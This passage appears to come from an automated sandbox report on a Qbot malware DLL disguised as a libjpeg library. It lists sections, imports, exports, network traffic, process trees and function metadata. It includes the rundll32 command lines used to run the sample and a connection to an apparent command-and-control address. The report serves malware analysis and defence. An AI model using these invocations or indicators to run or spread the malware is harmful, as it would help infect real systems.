/55	0x7c000	0x24f4d	0x25000	False	0.9180215371621622	data	7.808486707251028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/67	0xa1000	0x38	0x200	False	0.1171875	data	0.6947581054952565	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

KERNEL32.dll

DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, InterlockedCompareExchange, InterlockedExchange, LeaveCriticalSection, LoadLibraryA, QueryPerformanceCounter, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualProtect, VirtualQuery

msvcrt.dll

__dllonexit, _amsg_exit, _initterm, _iob, _lock, _onexit, _unlock, abort, calloc, exit, ferror, fflush, fprintf, fread, free, fwrite, getenv, malloc, memcpy, memset, sprintf, sscanf, strlen, strncmp, vfprintf

Exports

Name	Ordinal	Address
lcopy_block_row	1	0x6adade90
lcopy_sample_rows	2	0x6adade30
ldiv_round_up	3	0x6adaddf0
linit_1pass_quantizer	4	0x6adabf70
linit_2pass_quantizer	5	0x6adadc70
linit_c_coef_controller	6	0x6ad82a40
linit_c_main_controller	7	0x6ad8c450
linit_c_master_control	8	0x6ad8f7f0
linit_c_prep_controller	9	0x6ad933c0
linit_color_converter	10	0x6ad83cf0
linit_color_deconverter	11	0x6ad9a0e0
linit_compress_master	12	0x6ad8c240
linit_d_coef_controller	13	0x6ad97f90
linit_d_main_controller	14	0x6ad9d790
linit_d_post_controller	15	0x6ada4f10
linit_downsampler	16	0x6ad93f00
linit_forward_dct	17	0x6ad84840
linit_huff_decoder	18	0x6ad9c280
linit_huff_encoder	19	0x6ad8c190
linit_input_controller	20	0x6ad9d100
linit_inverse_dct	21	0x6ad9a8b0
linit_marker_reader	22	0x6ad9fd60
linit_marker_writer	23	0x6ad8e8a0
linit_master_decompress	24	0x6ada0a60
linit_memory_mgr	25	0x6adaf3e0
linit_merged_upsampler	26	0x6ada3760
linit_phuff_decoder	27	0x6ada4af0
linit_phuff_encoder	28	0x6ad92de0
linit_upsampler	29	0x6ada55e0
lpeg_CreateCompress	30	0x6ad815b0
lpeg_CreateDecompress	31	0x6ad94f40
lpeg_abort	32	0x6ad8fb40
lpeg_abort_compress	33	0x6ad81730
lpeg_abort_decompress	34	0x6ad95150
lpeg_add_quant_table	35	0x6ad8fc20
lpeg_alloc_huff_table	36	0x6ad8fbf0
lpeg_alloc_quant_table	37	0x6ad8fbc0
lpeg_calc_output_dimensions	38	0x6ada0270
lpeg_consume_input	39	0x6ad95430
lpeg_copy_critical_parameters	40	0x6ad94c60
lpeg_crop_scanline	105	0x6ad95bb0
lpeg_default_colorspace	41	0x6ad8fe60
lpeg_destroy	42	0x6ad8fb90
lpeg_destroy_compress	43	0x6ad81720
lpeg_destroy_decompress	44	0x6ad95140
lpeg_fdct_float	45	0x6ada5ce0
lpeg_fdct_ifast	46	0x6ada5ec0
lpeg_fdct_islow	47	0x6ada60e0
lpeg_fill_bit_buffer	48	0x6ad9b0a0
lpeg_finish_compress	49	0x6ad817f0
lpeg_finish_decompress	50	0x6ad95740
lpeg_finish_output	51	0x6ad963f0
lpeg_free_large	52	0x6adaf570
lpeg_free_small	53	0x6adaf550
lpeg_gen_optimal_table	54	0x6ad8bcf0
lpeg_get_large	55	0x6adaf560
lpeg_get_small	56	0x6adaf540
lpeg_has_multiple_scans	57	0x6ad95700
lpeg_huff_decode	58	0x6ad9b1e0
lpeg_idct_1x1	59	0x6adab430
lpeg_idct_2x2	60	0x6adab130
lpeg_idct_4x4	61	0x6adaace0
lpeg_idct_float	62	0x6ada6380
lpeg_idct_ifast	63	0x6ada6880
lpeg_idct_islow	64	0x6ada6ea0
lpeg_input_complete	65	0x6ad956c0
lpeg_make_c_derived_tbl	66	0x6ad8b7a0
lpeg_make_d_derived_tbl	67	0x6ad9ac10
lpeg_mem_available	68	0x6adaf580
lpeg_mem_dest	102	0x6ad966f0
lpeg_mem_init	69	0x6adaf5b0
lpeg_mem_src	103	0x6ad969e0
lpeg_mem_term	70	0x6adaf5c0
lpeg_new_colormap	71	0x6ada09f0
lpeg_open_backing_store	72	0x6adaf590
lpeg_quality_scaling	73	0x6ad8fda0
lpeg_read_coefficients	74	0x6ada58d0
lpeg_read_header	75	0x6ad95160
lpeg_read_raw_data	76	0x6ad962c0
lpeg_read_scanlines	77	0x6ad95d90
lpeg_resync_to_restart	78	0x6ad9fc20
lpeg_save_markers	79	0x6ad9fed0
lpeg_set_colorspace	80	0x6ad90910
lpeg_set_defaults	81	0x6ad902a0
lpeg_set_linear_quality	82	0x6ad8fd40
lpeg_set_marker_processor	83	0x6ad9ffb0
lpeg_set_quality	84	0x6ad8fdd0
lpeg_simple_progression	85	0x6ad90d50
lpeg_skip_scanlines	104	0x6ad95e30
lpeg_start_compress	86	0x6ad81a50
lpeg_start_decompress	87	0x6ad95ad0
lpeg_start_output	88	0x6ad96380
lpeg_std_error	89	0x6ada5c70
lpeg_stdio_dest	90	0x6ad96680
lpeg_stdio_src	91	0x6ad96930
lpeg_suppress_tables	92	0x6ad81740
lpeg_write_coefficients	93	0x6ad94ae0
lpeg_write_m_byte	94	0x6ad819e0
lpeg_write_m_header	95	0x6ad81980
lpeg_write_marker	96	0x6ad818f0
lpeg_write_raw_data	97	0x6ad81bb0
lpeg_write_scanlines	98	0x6ad81ae0
lpeg_write_tables	99	0x6adadeb0
lround_up	100	0x6adade10
next	101	0x6ad819f0

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 6, 2023 20:15:44.428622007 CEST	49720	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:44.428693056 CEST	443	49720	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:44.428812981 CEST	49720	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:44.432526112 CEST	49720	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:44.432560921 CEST	443	49720	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:44.796180010 CEST	443	49720	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:44.796325922 CEST	49720	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:44.969425917 CEST	49720	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:44.969487906 CEST	443	49720	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:44.970371962 CEST	443	49720	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:44.970494032 CEST	49720	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:44.972126961 CEST	49720	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:45.016293049 CEST	443	49720	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:45.078532934 CEST	443	49720	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:45.081522942 CEST	49720	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:47.328047991 CEST	49722	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:47.328134060 CEST	443	49722	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:47.328308105 CEST	49722	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:47.329001904 CEST	49722	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:47.329044104 CEST	443	49722	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:47.824717045 CEST	443	49722	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:47.824810028 CEST	49722	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:47.825309992 CEST	49722	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:47.825336933 CEST	443	49722	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:47.828093052 CEST	49722	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:47.828123093 CEST	443	49722	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:47.982481003 CEST	443	49722	68.87.41.40	192.168.2.3
Jun 6, 2023 20:15:47.982672930 CEST	49722	443	192.168.2.3	68.87.41.40
Jun 6, 2023 20:15:48.252844095 CEST	49725	443	192.168.2.3	85.101.239.116
Jun 6, 2023 20:15:48.252918959 CEST	443	49725	85.101.239.116	192.168.2.3
Jun 6, 2023 20:15:48.253082037 CEST	49725	443	192.168.2.3	85.101.239.116
Jun 6, 2023 20:15:48.258398056 CEST	49725	443	192.168.2.3	85.101.239.116
Jun 6, 2023 20:15:48.258436918 CEST	443	49725	85.101.239.116	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 6, 2023 20:15:44.271231890 CEST	51139	53	192.168.2.3	8.8.8.8
Jun 6, 2023 20:15:44.417438984 CEST	53	51139	8.8.8.8	192.168.2.3
Jun 6, 2023 20:15:45.086958885 CEST	52955	53	192.168.2.3	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 6, 2023 20:15:44.271231890 CEST	192.168.2.3	8.8.8.8	0xb0a2	Standard query (0)	xfinity.com	A (IP address)	IN (0x0001)	false
Jun 6, 2023 20:15:45.086958885 CEST	192.168.2.3	8.8.8.8	0xe54d	Standard query (0)	www.xfinity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 6, 2023 20:15:44.417438984 CEST	8.8.8.8	192.168.2.3	0xb0a2	No error (0)	xfinity.com		68.87.41.40	A (IP address)	IN (0x0001)	false
Jun 6, 2023 20:15:44.417438984 CEST	8.8.8.8	192.168.2.3	0xb0a2	No error (0)	xfinity.com		96.114.21.40	A (IP address)	IN (0x0001)	false
Jun 6, 2023 20:15:44.417438984 CEST	8.8.8.8	192.168.2.3	0xb0a2	No error (0)	xfinity.com		96.114.14.140	A (IP address)	IN (0x0001)	false
Jun 6, 2023 20:15:45.113743067 CEST	8.8.8.8	192.168.2.3	0xe54d	No error (0)	www.xfinity.com	www.xfinity.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

xfinity.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49720	68.87.41.40	443	C:\Windows\SysWOW64\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-06 18:15:44 UTC	0	OUT	GET / HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, / User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xfinity.com Cache-Control: no-cache
2023-06-06 18:15:45 UTC	0	IN	HTTP/1.1 301 Moved Permanently Location: https://www.xfinity.com/ Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49722	68.87.41.40	443	C:\Windows\SysWOW64\wermgr.exe

Timestamp	kBytes transferred	Direction	Data
2023-06-06 18:15:47 UTC	0	OUT	GET / HTTP/1.1 Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, / User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: xfinity.com Cache-Control: no-cache Cookie: xpgn=1
2023-06-06 18:15:47 UTC	0	IN	HTTP/1.1 301 Moved Permanently Location: https://www.xfinity.com/ Content-Length: 0 Content-Type: text/html; charset=UTF-8

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 7304, Parent PID: 3452

General

Target ID:	0
Start time:	20:12:33
Start date:	06/06/2023
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\050_qbot.dll"
Imagebase:	0x1e0000
File size:	126464 bytes
MD5 hash:	3B4636AE519868037940CA5C4272091B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7312, Parent PID: 7304

General

Target ID:	1
Start time:	20:12:33
Start date:	06/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7340, Parent PID: 7304

General

Target ID:	2
Start time:	20:12:33
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",#1
Imagebase:	0xb0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7348, Parent PID: 7304

General

Target ID:	3
Start time:	20:12:33
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\050_qbot.dll,lcopy_block_row
Imagebase:	0xe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7360, Parent PID: 7340

General

Target ID:	4
Start time:	20:12:33
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",#1
Imagebase:	0xe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7464, Parent PID: 7348

General

Target ID:	8
Start time:	20:12:33
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7348 -s 652
Imagebase:	0x830000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7472, Parent PID: 7360

General

Target ID:	9
Start time:	20:12:33
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 176
Imagebase:	0x830000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7576, Parent PID: 7304

General

Target ID:	10
Start time:	20:12:36
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\050_qbot.dll,lcopy_sample_rows
Imagebase:	0xe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7604, Parent PID: 7304

General

Target ID:	11
Start time:	20:12:39
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\050_qbot.dll,ldiv_round_up
Imagebase:	0xe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7644, Parent PID: 7304

General

Target ID:	12
Start time:	20:12:42
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lcopy_block_row
Imagebase:	0xe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7652, Parent PID: 7304

General

Target ID:	13
Start time:	20:12:42
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lcopy_sample_rows
Imagebase:	0xe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7660, Parent PID: 7304

General

Target ID:	14
Start time:	20:12:42
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",ldiv_round_up
Imagebase:	0xe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7680, Parent PID: 7304

General

Target ID:	16
Start time:	20:12:42
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",next
Imagebase:	0xe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000010.00000002.404593397.000000000294A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000010.00000002.405110425.00000000046D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7704, Parent PID: 7304

General

Target ID:	17
Start time:	20:12:42
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lround_up
Imagebase:	0xe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7716, Parent PID: 7304

General

Target ID:	18
Start time:	20:12:42
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\050_qbot.dll",lpeg_write_tables
Imagebase:	0xe0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7752, Parent PID: 7644

General

Target ID:	20
Start time:	20:12:43
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 652
Imagebase:	0x830000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 7784, Parent PID: 7716

General

Target ID:	21
Start time:	20:12:43
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7716 -s 652
Imagebase:	0x830000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wermgr.exePID: 7868, Parent PID: 7680

General

Target ID:	22
Start time:	20:12:47
Start date:	06/06/2023
Path:	C:\Windows\SysWOW64\wermgr.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\wermgr.exe
Imagebase:	0x1180000
File size:	191904 bytes
MD5 hash:	CCF15E662ED5CE77B5FF1A7AAE305233
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: rundll32.exePID: 7348, Parent PID: 7304COMMON

Non-executed Functions

Function 6AD814B0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6AD814C5
LoadLibraryA.KERNEL32 ref: 6AD814DC
GetProcAddress.KERNEL32 ref: 6AD814F5
GetModuleHandleA.KERNEL32 ref: 6AD81523
GetProcAddress.KERNEL32 ref: 6AD8153C

Strings

libgcc_s_dw2-1.dll, xrefs: 6AD814BE, 6AD814D5
__register_frame_info, xrefs: 6AD814EA
libgcj-13.dll, xrefs: 6AD8151C
_Jv_RegisterClasses, xrefs: 6AD81531

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc$LibraryLoad
String ID: _Jv_RegisterClasses$__register_frame_info$libgcc_s_dw2-1.dll$libgcj-13.dll
API String ID: 652391981-159345992
Opcode ID: 174b7f510952e3c1a7d92b62687ddb2c84a904ca156fc8ec012c0c85c4e93b87
Instruction ID: d675804f6bb312547546230e90a1c997c02a84e616a9ee9daeb6eabfd02d7456
Opcode Fuzzy Hash: 174b7f510952e3c1a7d92b62687ddb2c84a904ca156fc8ec012c0c85c4e93b87
Instruction Fuzzy Hash: B00161F1904200ABEB007F78964675E7EF8AF05212F83452CE896C7304EE34E958DBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6ADC5370 Relevance: 13.6, APIs: 9, Instructions: 76COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6ADC53BF
UnhandledExceptionFilter.KERNEL32 ref: 6ADC53CF
GetCurrentProcess.KERNEL32 ref: 6ADC53D8
TerminateProcess.KERNEL32 ref: 6ADC53E9
abort.MSVCRT ref: 6ADC53F2
EnterCriticalSection.KERNEL32 ref: 6ADC540E
TlsGetValue.KERNEL32 ref: 6ADC5435
GetLastError.KERNEL32 ref: 6ADC543C
LeaveCriticalSection.KERNEL32 ref: 6ADC545C

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: CriticalExceptionFilterProcessSectionUnhandled$CurrentEnterErrorLastLeaveTerminateValueabort
String ID:
API String ID: 2989179798-0
Opcode ID: 9065017ed5234fb123e44d6708054de625382f9d5a539402cf28e2b5284c4d17
Instruction ID: f99962f86f4e8b76b4a3158b28e751bbda0fe3d772afa358b4769054948631d1
Opcode Fuzzy Hash: 9065017ed5234fb123e44d6708054de625382f9d5a539402cf28e2b5284c4d17
Instruction Fuzzy Hash: BB2146F1944244CFEF00AFA9E68954A7BF4AB06305F424569DD89CB304EB34A9588FA3

Uniqueness

Uniqueness Score: -1.00%

Function 6ADC52A0 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 6ADC52F7
GetCurrentProcessId.KERNEL32 ref: 6ADC5308
GetCurrentThreadId.KERNEL32 ref: 6ADC5312
GetTickCount.KERNEL32 ref: 6ADC531A
QueryPerformanceCounter.KERNEL32 ref: 6ADC532B

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391874951.000000006ADF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391879196.000000006ADF4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391883020.000000006ADFA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ad80000_rundll32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 15bf34995bc2e6ba5b4e109c97f67aa5a0ff947541128098c1ae30e2d0d30fa0
Instruction ID: 698e9afb54e5ee92a4174f6037402d37887ea11ce9714d7ecb95810e9d252d71
Opcode Fuzzy Hash: 15bf34995bc2e6ba5b4e109c97f67aa5a0ff947541128098c1ae30e2d0d30fa0
Instruction Fuzzy Hash: D711F6B5848300CFEB109F29D54411EBBF5BB8A344F86492DE986E7310EB35EA458F82

Uniqueness

Uniqueness Score: -1.00%

Function 6ADA6880 Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.391794533.000000006AD81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6AD80000, based on PE: true

Associated: 00000003.00000002.391790467.000000006AD80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.391851609.000000006ADC7000.00000002.00000001.01000000.00000003.sdmpDownload File
